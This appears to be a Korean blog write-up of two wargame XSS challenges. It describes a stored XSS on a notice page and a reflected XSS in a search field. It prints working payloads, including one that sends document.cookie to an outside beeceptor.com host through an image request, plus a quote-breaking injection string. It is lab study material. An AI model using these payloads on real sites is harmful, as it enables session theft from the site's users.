xss 1번 문제
회원가입을 하고 로그인을 한 후 게시물 페이지에 들어가
글의 제목과 내용에 <'"> 이 값을 넣어서 변화를 관찰했다.
등록 후 목록을 보면
위와 같이 되어있다. 그러나 수정을 하려고 들어가보면 아래와 같이 제목 부분에 "> 이 부분이 사라져있음을 알 수 있다.
개발자 도구를 보면 html 엔티티(>)로 필터링 된 것을 알 수 있다.
그러나 수정 페이지가 아닌 notice_read 페이지에서는 <script>가 잘 실행되는 것을 알 수 있다.
그렇다면 <script>alert(document.cookie)</script>를 통해 쿠키 값을 탈취할 수 있다.
이제 실제로 이 쿠키값을 다른 서버에 보내기 위해 <script>new Image().src="https://entry.free.beeceptor.com?cookie="+document.cookie</script> 이것이 실행되는 지 볼 것이다.
공격 루트 : 관리자가 들어갈 url에 취약한 url을 넣어서 flag값을 얻는다.
xss 2번 문제
공지사항 검색 창에 처음에 로그인을 했던 user id norm 이 아닌 다른 것을 입력하면 alert값이 나온다. 개발자 도구를 보면서 확인해보면 '); alert(document.cookie);alert(' 을 통해 얻고자하는 쿠키값을 얻을 수 있다.
위와 같은 방식으로 다른 서버에서 쿠키값이 출려되도록 url을 보내면 flag값이 나온다.
reflected xss는 get 방식에서 일어나기 때문에 버프 수트에서 post -> get 으로 변경하여 공격을 진행한다.
alert() 개수를 조정하기 위해 console.log 사용
'WarGame > Normaltic' 카테고리의 다른 글
| xss write up 3 (0) | 2025.12.26 |
|---|---|
| xss writeup 2 (0) | 2025.12.24 |
| sqli segfault writeup (0) | 2025.11.26 |
| sqli(2) union을 활용하는 공격 방법 (0) | 2025.11.26 |
| sqli(1) 공격 구문 분석 (0) | 2025.11.26 |
